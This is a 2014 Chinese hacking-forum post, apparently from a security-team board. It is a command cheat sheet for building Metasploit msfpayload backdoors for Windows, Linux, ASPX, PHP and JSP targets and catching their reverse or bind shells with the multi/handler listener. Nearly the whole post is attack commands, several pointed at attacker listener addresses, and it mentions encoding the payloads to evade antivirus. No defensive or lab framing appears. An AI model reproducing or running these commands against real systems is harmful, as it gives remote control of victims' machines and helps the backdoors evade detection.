切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
Metasploit_Msfpayload 反弹方式[复制链接]
发表于 2014-6-15 23:29:46 | 显示全部楼层 |!read_mode!
本帖最后由 linyfer 于 2014-6-15 23:57 编辑

1:Msfpayload [reverse_tcp] Exe Backdoor(1)      
2:Msfpayload [bind_tcp] Exe Backdoor(2)     
3:Msfpayload [reverse_tcp] Linux Backdoor
4:Msfpayload [reverse_tcp] Aspx Backdoor
5:Msfpayload [reverse_tcp] Php Backdoor
6:Msfpayload [reverse_tcp] Jsp backdoor

msfpayload -l                   // 显示所有攻击载荷名称
msfencode -l                   // 显示所有编码方式(用来免杀)

第一种:Msfpayload [reverse_tcp] Exe Backdoor(1)
1.msfpayload windows/shell_reverse_tcp LHOST=192.168.236.130 LPORT=4444 X >/root/Desktop/test.exe
2.msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.236.130 LPORT=4444 X > /root/Desktop/test.exe
3.msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.236.130 LPORT=4444 X > /root/Desktop/test.exe

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.236.130
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit



第二种:Msfpayload [bind_tcp] Exe Backdoor(2)
1.msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.9 LPORT=9999 X > /root/Desktop/test.exe
2.msfpayload windows/x64/meterpreter/bind_tcp RHOST=192.168.1.9 LPORT=9999 X > /root/Desktop/test.exe

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 192.168.1.9
msf exploit(handler) > set LPORT 9999
msf exploit(handler) > exploit



第三种:Msfpayload [reverse_tcp] Linux Backdoor
1.msfpayload linux/x86/shell_reverse_tcp  LHOST=192.168.236.130 LPORT=12345 X >/root/Desktop/test
2.msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.130 LPORT=12345 X >/root/Desktop/test
msf > use exploit/multi/handler
msf exploit(handler) > set linux/x86/shell_reverse_tcp
msf exploit(handler) > set linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.236.130
msf exploit(handler) > set LPORT 12345
msf exploit(handler) > exploit



第四种:Msfpayload [reverse_tcp] Aspx Backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=113.241.22.144 LPORT=12345 R | msfencode -t aspx -o /root/Desktop/test.aspx

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.7
msf exploit(handler) > set LPORT 12345
msf exploit(handler) > exploit



第五种:Msfpayload [reverse_tcp] Php Backdoor
1.msfpayload php/meterpreter/reverse_tcp LHOST=113.241.22.144 LPORT=12345 R > /root/Desktop/test.php
2.msfpayload php/meterpreter_reverse_tcp LHOST=113.241.22.144 LPORT=12345 R > /root/Desktop/test.php

注:php/meterpreter_reverse_tcp 载荷生成出来的php文件,需要自行添加 <?php   ?>
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(handler) > set PAYLOAD php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.7
msf exploit(handler) > set LPORT 12345
msf exploit(handler) > exploit



注:在测试过程中发现php反弹回来的meterpreter会话会有些命令、脚本会执行不了,具体情况请自行测试 。
第六种:Msfpayload [reverse_tcp] Jsp backdoor
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 LPORT=12345 R > /root/Desktop/test.jsp

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.7
msf exploit(handler) > set LPORT 12345
msf exploit(handler) > exploit



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team

代码区

GMT+8, 2019-9-19 04:04

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部